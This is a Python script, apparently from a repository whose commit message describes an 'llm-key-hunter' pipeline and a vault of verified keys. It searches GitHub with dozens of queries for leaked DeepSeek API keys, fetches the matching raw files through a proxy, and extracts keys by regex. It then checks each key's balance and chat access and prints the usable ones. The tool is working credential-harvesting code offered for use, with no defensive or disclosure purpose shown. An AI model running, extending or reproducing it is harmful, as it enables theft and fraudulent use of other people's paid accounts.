- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
394 lines
14 KiB
Python
394 lines
14 KiB
Python
#!/usr/bin/env python3
|
|
"""DeepSeek targeted deep hunter.
|
|
|
|
Pipeline:
|
|
1. Search GitHub for DeepSeek key leaks (sk-<32 hex>) with provider-specific queries.
|
|
2. Fetch raw files, extract keys matching sk-[a-f0-9]{32}.
|
|
3. Merge with previously-extracted DeepSeek keys (results/extracted_keys.txt).
|
|
4. Deep verify:
|
|
a. GET /user/balance
|
|
b. POST /v1/chat/completions model=deepseek-chat
|
|
c. POST /v1/chat/completions model=deepseek-reasoner
|
|
5. Classification (LO's rule: only HTTP 401 = DEAD).
|
|
|
|
Outputs results/deepseek_deep/{usable,no_balance,no_access,unknown,dead,all_non_401}.txt
|
|
"""
|
|
|
|
import argparse
|
|
import json
|
|
import os
|
|
import re
|
|
import subprocess
|
|
import sys
|
|
import time
|
|
import urllib.request
|
|
import urllib.error
|
|
import urllib.parse
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
import sys as _sys
|
|
_sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from verify_cache import CachedVerifier
|
|
|
|
HERE = Path(__file__).parent
|
|
RESULTS_DIR = HERE / "results" / "deepseek_deep"
|
|
RESULTS_DIR.mkdir(parents=True, exist_ok=True)
|
|
EXTRACTED_FILE = RESULTS_DIR / "extracted_keys.txt"
|
|
GLOBAL_EXTRACTED = HERE / "results" / "extracted_keys.txt"
|
|
|
|
UA = "curl/8.5.0"
|
|
BASE = "https://api.deepseek.com"
|
|
|
|
# GitHub API/raw are GFW-blocked from this host; route through a CN proxy that can reach it.
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
_gh_opener = None
|
|
|
|
def gh_opener():
|
|
global _gh_opener
|
|
if _gh_opener is None:
|
|
if GH_PROXY:
|
|
handler = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY})
|
|
_gh_opener = urllib.request.build_opener(handler)
|
|
else:
|
|
_gh_opener = urllib.request.build_opener()
|
|
return _gh_opener
|
|
|
|
KEY_RE = re.compile(r"sk-[a-f0-9]{32}")
|
|
BLACKLIST = (
|
|
"00000000000000000000000000000000",
|
|
"1234567890abcdef1234567890abcdef",
|
|
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
|
|
"your-", "example", "placeholder", "test-key",
|
|
)
|
|
|
|
SEARCH_QUERIES = [
|
|
'"DEEPSEEK_API_KEY" extension:env',
|
|
'"DEEPSEEK_API_KEY" extension:py extension:ipynb',
|
|
'"DEEPSEEK_KEY" extension:env',
|
|
'"DEEPSEEK_API_KEY" extension:yaml',
|
|
'"DEEPSEEK_API_KEY" extension:yml',
|
|
'"DEEPSEEK_API_KEY" extension:json',
|
|
'"DEEPSEEK_API_KEY" extension:toml',
|
|
'"DEEPSEEK_API_KEY" extension:ini',
|
|
'"api.deepseek.com" extension:py',
|
|
'"api.deepseek.com" extension:js',
|
|
'"api.deepseek.com" extension:ts',
|
|
'"api.deepseek.com" extension:go',
|
|
'"api.deepseek.com/v1/chat/completions"',
|
|
'"api.deepseek.com" bearer sk-',
|
|
'"deepseek-chat" Authorization: Bearer sk-',
|
|
'"deepseek-reasoner" sk-',
|
|
'"DEEPSEEK_API_KEY" filename:docker-compose',
|
|
'"deepseek" filename:.env',
|
|
'"deepseek_api_key" extension:py',
|
|
'deepseek "sk-" filename:.env',
|
|
'deepseek "sk-" filename:config.py',
|
|
'deepseek "sk-" filename:settings.py',
|
|
'deepseek "sk-" filename:local.settings.json',
|
|
'"deepseek-chat" filename:.env',
|
|
'deepseek "base_url" "api.deepseek.com" extension:py',
|
|
'DEEPSEEK_API_KEY=sk-',
|
|
'DEEPSEEK_KEY=sk-',
|
|
'deepseek_api_key=sk-',
|
|
'DeepSeek_API_KEY=sk-',
|
|
'deepseekToken=sk-',
|
|
'"deepseek" "sk-" filename:config.json',
|
|
'"deepseek" "sk-" filename:config.toml',
|
|
'"deepseek" "sk-" filename:config.yaml',
|
|
'"deepseek/v1" filename:.env',
|
|
]
|
|
|
|
|
|
def github_token():
|
|
tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
if tok:
|
|
return tok
|
|
try:
|
|
out = subprocess.run(["gh", "auth", "token"],
|
|
capture_output=True, text=True, timeout=10)
|
|
if out.returncode == 0:
|
|
return out.stdout.strip()
|
|
except FileNotFoundError:
|
|
pass
|
|
hosts = Path.home() / ".config" / "gh" / "hosts.yml"
|
|
if hosts.exists():
|
|
for line in hosts.read_text().splitlines():
|
|
line = line.strip()
|
|
if line.startswith("oauth_token:"):
|
|
return line.split(":", 1)[1].strip()
|
|
return None
|
|
|
|
|
|
def gh_api_search(query, token, per_page=100):
|
|
headers = {
|
|
"Accept": "application/vnd.github+json",
|
|
"User-Agent": "key-hunter",
|
|
}
|
|
if token:
|
|
headers["Authorization"] = f"Bearer {token}"
|
|
for page in range(1, 11):
|
|
url = ("https://api.github.com/search/code"
|
|
f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}")
|
|
req = urllib.request.Request(url, headers=headers)
|
|
try:
|
|
with gh_opener().open(req, timeout=30) as resp:
|
|
data = json.loads(resp.read())
|
|
except urllib.error.HTTPError as e:
|
|
if e.code in (403, 429):
|
|
reset = e.headers.get("X-RateLimit-Reset")
|
|
wait = max(int(reset) - int(time.time()), 5) if reset else 30
|
|
print(f" rate-limited, waiting {wait}s...", file=sys.stderr)
|
|
time.sleep(wait + 1)
|
|
continue
|
|
if e.code == 422:
|
|
return
|
|
print(f" HTTP {e.code} for {query!r}: {e.read()[:200]}", file=sys.stderr)
|
|
return
|
|
except Exception as e:
|
|
print(f" network error: {e}", file=sys.stderr)
|
|
return
|
|
items = data.get("items", [])
|
|
if not items:
|
|
return
|
|
for it in items:
|
|
yield it
|
|
if len(items) < per_page:
|
|
return
|
|
time.sleep(2.2 if token else 7)
|
|
|
|
|
|
def to_raw_url(html_url):
|
|
return html_url.replace("github.com", "raw.githubusercontent.com").replace("/blob/", "/")
|
|
|
|
|
|
def fetch_raw(url):
|
|
req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
|
|
try:
|
|
with gh_opener().open(req, timeout=20) as resp:
|
|
return resp.read().decode("utf-8", errors="replace")
|
|
except Exception:
|
|
return ""
|
|
|
|
|
|
def http_request(method, path, key, body=None, timeout=30):
|
|
url = f"{BASE}{path}"
|
|
h = {"User-Agent": UA, "Accept": "*/*", "Authorization": f"Bearer {key}"}
|
|
data = None
|
|
if body is not None:
|
|
data = json.dumps(body).encode()
|
|
h["Content-Type"] = "application/json"
|
|
req = urllib.request.Request(url, data=data, headers=h, method=method)
|
|
try:
|
|
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
|
return resp.getcode(), resp.read().decode("utf-8", errors="replace")
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
return e.code, e.read().decode("utf-8", errors="replace")
|
|
except Exception:
|
|
return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"network: {type(e).__name__}: {e}"
|
|
|
|
|
|
def classify_balance(code, body):
|
|
if code == 200:
|
|
try:
|
|
d = json.loads(body)
|
|
bal = d.get("balance_infos") or []
|
|
if bal:
|
|
total = 0.0
|
|
for b in bal:
|
|
try:
|
|
total += float(b.get("total_balance", 0))
|
|
except (TypeError, ValueError):
|
|
pass
|
|
if total > 0:
|
|
return "USABLE", f"balance: ¥{total:.4f} {bal[0].get('currency','')}"
|
|
return "NO_BALANCE", "balance: 0"
|
|
if d.get("is_available") is True:
|
|
return "USABLE", "balance: available"
|
|
if d.get("is_available") is False:
|
|
return "NO_BALANCE", "balance: unavailable"
|
|
return "USABLE", f"balance: {body[:120]}"
|
|
except json.JSONDecodeError:
|
|
return "USABLE", f"balance: {body[:120]}"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"bal HTTP {code}: {body[:140]}"
|
|
if code == 401:
|
|
return "DEAD", "401 unauthorized"
|
|
if code == 0:
|
|
return "UNKNOWN", body[:160]
|
|
return "NO_ACCESS", f"bal HTTP {code}: {body[:140]}"
|
|
|
|
|
|
def classify_chat(code, body):
|
|
bl = (body or "").lower()
|
|
if code == 200:
|
|
if '"choices"' in bl or '"id"' in bl:
|
|
return "USABLE", "chat 200 OK"
|
|
if any(x in bl for x in ("balance", "quota", "arrearage", "insufficient")):
|
|
return "NO_BALANCE", f"chat: {body[:120]}"
|
|
return "USABLE", f"chat: {body[:120]}"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"chat HTTP {code}: {body[:140]}"
|
|
if code == 401:
|
|
return "DEAD", "chat 401"
|
|
if code == 0:
|
|
return "UNKNOWN", body[:160]
|
|
return "NO_ACCESS", f"chat HTTP {code}: {body[:140]}"
|
|
|
|
|
|
RANK = {"USABLE": 4, "NO_BALANCE": 3, "NO_ACCESS": 2, "UNKNOWN": 1, "DEAD": 0}
|
|
|
|
|
|
def verify_key(key):
|
|
best, best_detail = "DEAD", ""
|
|
|
|
code, body = http_request("GET", "/user/balance", key)
|
|
v, d = classify_balance(code, body)
|
|
if RANK[v] > RANK[best]:
|
|
best, best_detail = v, d
|
|
if best == "USABLE":
|
|
return best, best_detail
|
|
|
|
for model in ("deepseek-chat", "deepseek-reasoner"):
|
|
code, body = http_request("POST", "/v1/chat/completions", key, body={
|
|
"model": model,
|
|
"messages": [{"role": "user", "content": "hi"}],
|
|
"max_tokens": 1,
|
|
})
|
|
v, d = classify_chat(code, body)
|
|
d = f"[{model}] {d}"
|
|
if RANK[v] > RANK[best]:
|
|
best, best_detail = v, d
|
|
if best == "USABLE":
|
|
return best, best_detail
|
|
|
|
return best, best_detail
|
|
|
|
|
|
def valid_key(k):
|
|
if not KEY_RE.fullmatch(k):
|
|
return False
|
|
low = k.lower()
|
|
return not any(b in low for b in BLACKLIST)
|
|
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--verify-only", action="store_true",
|
|
help="Skip GitHub search; verify existing extracted_keys.txt")
|
|
ap.add_argument("--workers", type=int, default=20)
|
|
ap.add_argument("--limit", type=int, default=0)
|
|
ap.add_argument("--no-cache", action="store_true")
|
|
args = ap.parse_args()
|
|
|
|
keys = {}
|
|
|
|
# Load previously-extracted DeepSeek keys from the global pool.
|
|
if GLOBAL_EXTRACTED.exists():
|
|
for line in GLOBAL_EXTRACTED.read_text().splitlines():
|
|
if not line.startswith("DeepSeek|"):
|
|
continue
|
|
parts = line.split("|", 3)
|
|
if len(parts) >= 3:
|
|
k, src = parts[1], parts[2]
|
|
if valid_key(k):
|
|
keys[k] = src
|
|
print(f"loaded {len(keys)} previously-extracted DeepSeek keys")
|
|
|
|
if not args.verify_only:
|
|
token = github_token()
|
|
print(f"GitHub token: {'yes' if token else 'NO (anonymous = 10 req/min)'}\n")
|
|
|
|
print("=== Stage 1: GitHub code search ===")
|
|
candidates = {}
|
|
for i, q in enumerate(SEARCH_QUERIES, 1):
|
|
print(f" [{i:2d}/{len(SEARCH_QUERIES)}] {q}")
|
|
try:
|
|
for it in gh_api_search(q, token):
|
|
u = it.get("html_url", "")
|
|
if u and u not in candidates:
|
|
candidates[u] = it.get("repository", {}).get("full_name", "?")
|
|
except Exception as e:
|
|
print(f" error: {e}", file=sys.stderr)
|
|
print(f" candidate files: {len(candidates)}")
|
|
|
|
print("\n=== Stage 2: fetch raw & extract keys ===")
|
|
fetched = 0
|
|
new_keys = 0
|
|
with ThreadPoolExecutor(max_workers=20) as pool:
|
|
futs = {pool.submit(fetch_raw, to_raw_url(u)): u for u in candidates}
|
|
for fut in as_completed(futs):
|
|
u = futs[fut]
|
|
fetched += 1
|
|
try:
|
|
content = fut.result()
|
|
except Exception:
|
|
content = ""
|
|
for k in KEY_RE.findall(content):
|
|
if valid_key(k) and k not in keys:
|
|
keys[k] = u
|
|
new_keys += 1
|
|
if fetched % 100 == 0:
|
|
print(f" fetched {fetched}/{len(candidates)}, total keys={len(keys)} (new={new_keys})")
|
|
print(f" extracted total: {len(keys)} keys ({new_keys} new)")
|
|
|
|
with open(EXTRACTED_FILE, "w") as f:
|
|
for k, src in sorted(keys.items()):
|
|
f.write(f"{k}|{src}\n")
|
|
|
|
if args.limit > 0:
|
|
keys = dict(list(keys.items())[:args.limit])
|
|
print(f" (limited to first {args.limit})")
|
|
|
|
print(f"\n=== Stage 3: deep verify {len(keys)} keys (workers={args.workers}) ===")
|
|
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [], "UNKNOWN": [], "DEAD": []}
|
|
processed = 0
|
|
start = time.time()
|
|
with CachedVerifier('deepseek', verify_key, force=getattr(args,'no_cache',False)) as ver:
|
|
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
|
futs = {pool.submit(ver, k): (k, src) for k, src in keys.items()}
|
|
for fut in as_completed(futs):
|
|
k, src = futs[fut]
|
|
processed += 1
|
|
try:
|
|
v, d = fut.result()
|
|
except Exception as e:
|
|
v, d = "UNKNOWN", f"exc: {e}"
|
|
buckets[v].append((k, src, d))
|
|
if processed % 50 == 0:
|
|
el = time.time() - start
|
|
print(f" [{processed:5d}/{len(keys)}] "
|
|
f"usable={len(buckets['USABLE'])} "
|
|
f"nobal={len(buckets['NO_BALANCE'])} "
|
|
f"noacc={len(buckets['NO_ACCESS'])} "
|
|
f"unk={len(buckets['UNKNOWN'])} "
|
|
f"dead={len(buckets['DEAD'])} "
|
|
f"({processed/el:.1f}/s)")
|
|
|
|
elapsed = time.time() - start
|
|
print(f"\nDone in {elapsed:.1f}s")
|
|
for name in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
|
|
path = RESULTS_DIR / f"{name.lower()}.txt"
|
|
with open(path, "w") as f:
|
|
for k, src, d in sorted(buckets[name]):
|
|
f.write(f"{k}|{src}|{d}\n")
|
|
print(f" {name:11s}: {len(buckets[name]):5d} -> {path.name}")
|
|
|
|
with open(RESULTS_DIR / "all_non_401.txt", "w") as f:
|
|
for name in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN"):
|
|
for k, src, d in sorted(buckets[name]):
|
|
f.write(f"{name}|{k}|{src}|{d}\n")
|
|
|
|
if buckets["USABLE"]:
|
|
print("\n=== USABLE KEYS ===")
|
|
for k, src, d in sorted(buckets["USABLE"]):
|
|
print(f" {k}")
|
|
print(f" src: {src}")
|
|
print(f" {d}")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|